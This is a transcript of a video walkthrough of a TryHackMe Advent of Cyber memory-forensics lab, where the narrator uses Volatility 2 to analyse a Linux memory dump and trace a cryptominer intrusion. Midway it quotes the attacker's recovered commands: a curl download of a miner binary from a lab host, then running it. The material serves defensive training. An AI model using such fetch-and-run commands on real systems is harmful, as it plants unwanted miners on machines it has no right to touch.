Hey everybody, welcome back to my channel. This is WireDogSec and I'm back with another video for you guys. Today's video, we're going to continue on with the TryHackMe Advent of Cyber 2023 event. This is going to be day number 19, Memory Forensics, Crypto Miners, Sing, Volatility. Alright, so without further ado, let's go ahead and jump into it. Okay, learning objectives. Understand what memory forensics is and how to use it in digital forensics investigation. Understand what volatile data and memory dumps are. Learn about volatility and how it can be used to analyze a memory dump. And learn about volatility profiles. All right, so we're going to skim through a lot of this here. So be sure to check out the room and read the information all the way through. What is memory forensics? Memory forensics, also known as volatile memory analysis or random access memory RAM forensics, is a branch of digital forensics. It involves the examination and analysis of a computer's volatile memory RAM to uncover digital evidence and artifacts related to computer security incidents, cybercrimes, and other forensic investigations. This differs from hard disk forensics, where all files on the disk can be recovered and then studied. What is volatile data? In computer forensics, volatile data refers to information that is temporarily stored in a computer's RAM and can be easily lost or altered when the computer is powered off. Volatile data is crucial for digital investigators because it provides a snapshot of the computer state at the time of an incident. Any incident responder should be aware of what volatile data is. That when looking or the reason is that when looking into a device that has been compromised, an initial reaction might be to turn off the device to contain the threat. Some examples of volatile data are running processes, network connections, and RAM content. Volatile data is not written to disk and is constantly changing memory. What is a memory dump? A memory dump is a snapshot of memory that has been captured to perform memory analysis. It will contain data related to running processes captured when the memory dump is or was created. Benefits of memory forensics. Memory forensics offers valuable benefits in digital investigations by capturing real-time data from a computer's volatile memory. It provides rapid insight into ongoing activities, detects stealthy threats, captures volatile data like passwords, and allows investigators to understand user actions and system states during incidents, all without altering the target system. All right. Another thing to keep in mind is that capturing hard disk image of a device can be time consuming. Then you have to consider the problem of transferring the image, which could be hundreds of gigabytes in size, and that's before you even consider how long the analysis will take the incident response IR team. What are processes? A process is an independent, self-controlled unit of execution within an operating system that consists of its own program code, data, memory space, and system resources. Imagine your computer as a busy chef in a kitchen. The chef can cook multiple dishes simultaneously, but to keep things organized, they use separate cooking stations for different tasks. Each cooking station has its own ingredients, pots, and pans. These cooking stations represent what we call processes in a computer. Says this is crucial in memory forensics because knowing the processes that were running during the capture of the memory dump will tell us what programs were also running at the time. We can categorize processes into two distinct groups. It's got them listed out here. You got user processes and background processes. Be sure to read through this here. Connect to the machine. Machine's already powered on, so I already have it ready to go. And split view. Volatility. Volatility is a command line tool that lets digital forensics and incident response teams analyze a memory dump in order to perform memory analysis. Volatility is written in Python and can analyze snapshots taken from Linux, Mac OS, and Windows. Volatility has a wide range of use cases, including the following: listing any device in closed network connections, listing a device's running processes at the time of capture, listing possible command line history values, etc., etc. For this task, we'll examine the memory dump of a Linux device. For your convenience, Volatility is already installed on the VM. We can take a look at the different help options using this below. So let's go ahead and do that. Open up a terminal here. I'm going to copy and paste this over, make it a lot easier. So let's see what it says. Of course, this help menu gives you all kinds of information here. All right, it's loading a little bit slow. But anyway, it's going to look like this here, right? And it says, note, if you want to know how Volatility can be installed and all of its other benefits, check out the Volatility room. So be sure to check that room out if you haven't done so already. At time of writing, there are two versions of Volatility: Volatility 2, which is built using Python 2, and Volatility 3, which uses Python 3. There are different use cases for each version, and depending on this, you might choose either one over the other. For example, Volatility 2 has been around for longer, so in some cases, it will have modules and plugins that have yet to be adapted for Volatility 3. For the purposes of this task, we're using Volatility 2. Before we start analyzing memory dump, let's go into what profiles are and how Volatility uses them. Volatility profiles. Profiles are crucial for correctly interpreting the memory dump from a target system. A profile in Volatility defines the operating system's architecture, version, and various memory specific to target system, etc., etc. You can see the rest there. Volatility comes with many profiles for the Windows operating systems, and we can verify this using this command here. So let's go ahead and do that. Vol.py info. So let me go ahead and clear this out of here and paste this info in here. There we go. All right. Now while that's loading up, let's go ahead and continue on. As you can see, there's various different profiles you can use here. All right, a ton of them. Holy crap, there's a lot. All right, let's continue here. Did you notice that there aren't any Linux profiles? Listed profiles for Linux operating system have to be manually created from the same device the memory dump is from. Here are some of the reasons why we typically have to create our own Linux profile. Linux is not a single monolithic operating system, but rather a diverse ecosystem with many distributions and configurations, etc., etc. Unlike Windows, which has more standardized memory structures and system APIs, Linux kernel internals can vary significantly across different distributions and versions. Linux is open source, meaning its source code is readily available for inspection and modification. Creating profiles is out of scope for this room, so for your convenience, a profile is already in the home Ubuntu desktop evidence directory called Ubuntu 5. Yada yada yada. You can see there .zip. Volatility's profile setup. Okay, so let's go ahead and follow along here. Let's go ahead and cd into this particular directory. So copy and paste this over. All right, so we're in there. I'm going to do ls, and there's the file right there. Okay, to use the profile, we have to copy it where Volatility stores the various profiles for Linux using this command. So let's go ahead and do that. All right, so copy this over and paste it. All right, and it says this will take care of this for us. Then run this right here to confirm our profile is set. So let's go ahead and do that. Clear this stuff out of here. There we go, and paste. All right, now let's see what it says. Awesome. So it looks like it's ready to go. All right, let's see. Yep. All right, it says, note, if you're curious about how to create a Linux profile, you'll find this article by Nicholas, I don't know how you pronounce his last name, very helpful. Now we can begin our analysis. So let's go ahead and get into that. Memory analysis. The file linux.mem contains the memory dump of the Linux server. We're going to analyze. This file is located in our home directory. For Volatility to begin the analysis, we have to specify the file with the -f flag and the profile with the -- profile flag. We can use the -h flag to look at all the different plugins we can use to help with our analysis. So let's go ahead and do that here. I'm going to copy and paste it over using the -h. So let's go ahead and clear this out of here and paste. Okay. Now while that's loading up, there we go. Awesome. You can see there's a plethora of different information and options, etc. here. We can see the different plugin options we can use. Let's start with the history file. Volatility plugins, history file. The history file is a good place to start because it allows us to see whether there are any commands executed by a malicious actor while they are on the system. To examine history files such as commands, you can use Linux_bash plugin. The command will take a little less than a minute to finish executing. So let's go ahead and do that here. Copy this over. All right, so let's clear this out. Here we go here. When performing a cross-reference check with the ELF analyst who was using the server, we identify the following suspicious commands: the MySQL -u root -p redacted command was used by the elf analyst, but the cat home elfie dot bash underscore history command was not. This means that the malicious actor most likely saw the MySQL command and had access to the database. There's a lot of sensitive information about the merger and the pipelines that the malicious actor could have gained access to. We also identified the curl HTTP 10.0.2.64 toy miner -o miner command, which the elf analyst confirms they didn't use themselves. This tells us that the malicious actor used curl to download the toy miner file and save it to -o parameter, yada yada yada. We can see that the malicious actor executed the miner file using the /miner command. Now that we understand what the malicious actor executed, we can look at the system's running processes. And this is what they're talking about. You can see all the information here. They did a sudo su, git clone, ls, make. They did all kinds of stuff on this particular machine here that we're looking at. All right, running processes and memory forensics. Examining running processes is a fundamental and crucial part of analyzing a system's memory dump. Analyzing running processes in memory forensics can be highly effective in identifying anomalies, yada yada yada. For example, we know that the mining program was executed, so let's see what that process looks like. To examine the running processes on the system, we can use the Linux underscore ps list plugin. So let's go ahead and do that here. I'm going to copy and paste this over, make it easier. All right. And let's go ahead and clear this out and paste. Here we go. All right, now while that is loading, let's continue on. As you can see, the plugin doesn't just list each process name, it also lists the PID and the parent process ID. This helps determine what is often used as a parent-child relationship between processes. There are only two anomalies that we can quickly identify. Number one, ELF analysts confirmed they didn't execute the minor process based on the program name. Our initial assumption is that we may be dealing with the crypto miner, etc., etc. The MySQL server appears to be benign, but this is misleading. The process of the MySQL is called MySQL LD as listed above. The ELF confirmed that they didn't execute this, given the PID of the process is different from the PPID of the miner process. This process did not spawn from the miner directly. We would like to know more about these processes. A good way to do this is by examining the binary of each process. We can do this via the process extraction. So as you're reviewing that particular information here, you should be able to see it throughout this. Okay, so let's go ahead and continue on here. See at crypt D, a bunch of stuff going on here. All right, so let's see, and this is what they're talking about here. SSH as well. So let's continue on and see if we can find out some more information. There's the MySQL server thing. They're talking about miner right there. Okay, process extraction. A good way to understand what a process is doing is by extracting the binary of the process. This will help us analyze its behavior by using malware analysis. We also want to extract the binary of the process as a form of evidence preservation. To extract the binary of the process for examination, we can utilize the Linux underscore procdump plugin, which you need to create a directory to indicate where we like to extract the process to go with the make directory extracted command. And then we utilize the -D flag to tell Volatility where to place the extract binary and indicate the process PID with the -p. So let's go ahead and do this based on our file history and running process findings. We're now going to extract the miner and MySQL server binaries using the commands below. So let's go ahead and follow along. Copy this stuff over and go ahead and clear this information out of here. Here we go. So directory is created, and let's go ahead and do this. All right. All right, now when you're running this, be sure to replace the PID with the actual PID of what you're trying to extract here, right? So miner is going to be 10.28.0, right? So I got that in there. I already ran it. Got miner extracted, and then the MySQL server 102.91, right? I got that extracted. So let's go ahead and continue here. We have successfully extracted the suspicious programs into the extracted folder. Having heard all the commotion, McSkitty offers to help with the investigation by taking over the operations. Threat intelligence tasks. McSkitty needs MD5 hashes for each extracted binary. We can provide with the following commands. So let's go ahead and do that. Okay, so to do this, we did the MD5 command here, and then the file location and the file name itself, and make sure to copy and paste those into the answers box here. All right, we have to go back a little bit, and we remember we saw the PID for the miner process was this 10280. We saw that earlier, and the password and the bash output file is right here, as we ran that command earlier, right here. So make sure we get that. And then we're back on track. All right, it says use the command strings, extract and miner, yada, yada, yada. So we're going to get to this part here shortly. Let's scroll back up and continue on. Okay. In the meantime, remember what he learned from the Linux forensic room, persistent mechanisms that can planted a malicious actor, crypto miner. Persistent mechanisms are ways a program can survive after reboot, yada, yada, yada. File extraction here. Says as stated above, we want to look at any cron files that may have been placed by the malicious actors or crypto miner. This can help us identify if there are any persistent mechanisms at play. For example, is the MySQL process or MySQL server process we found before part of a persistent mechanism. And it says we can use this Linux underscore enumerate files to check for files on the server. We're going to use it in combination with grep. So let's go ahead and do that here. So copy and paste this over, see what we can find out. All right. Now while that's running, let's continue on. We quickly identify the cron tab located in var spool cron tab's elf file. We speak to the elf analyst, who confirms that he didn't have any cron jobs set up on the server. We can now extract the file by selecting the inode value, the hex-like value located on the left of the file, and use the -o option to name our file during the output and place it in our previously created extract directory. So let's go ahead and do that. All right, it's finished running, as you can see here. And the suspicious one is this Elfie one right here. So we already got that, and then I ran the next following commands here. This one right here to extract the file, got the file extracted, and then did cat on it to see the actual details. Then I did this file edit, master reinstall, yada yada yada. It's got some more information about it. See right here. Okay, so let's continue on here. Go ahead and examine the contents of the Elfie file, which you already did, in order to understand how the MySQL process was placed. With all the overwhelming evidence, Elf McBlue decides to move to the incident to the company incident response and incident management process. So be sure to check that out if you don't know what that is. Given the nature of the incident threat, along with the current news of acquisition, the next question arises from this incident is, are the pipelines safe? Okay, so it looks like the next ones we have to discover is this here. And then also the after reading the LP file, what location is the MySQL process dropped in on the folder or on the file system? I mean, it says it right here, so we already have that answer. So let's find this one right here. So I ran the command stated above, right strings, extracted, miner, process ID, etc., etc. And as you're sifting through here, you'll see that you're going to come across this right here, and that's going to be the answer. So be sure to put the defanged version of it inside this box here. You can use that with CyberChef. It has a defang URL option in CyberChef, so be sure to do that. If you enjoyed this task, feel free to check out the Volatility Room. So check that out if you're interested in learning more about how this particular program works. Now, as always, if you enjoyed the video, be sure to hit the like button. If you're new here, consider subscribing by clicking that subscribe button and then the notification bell so you know anytime I post. As always, thank you for watching. Hopefully you learned something. Have a nice day, and I'll see you later.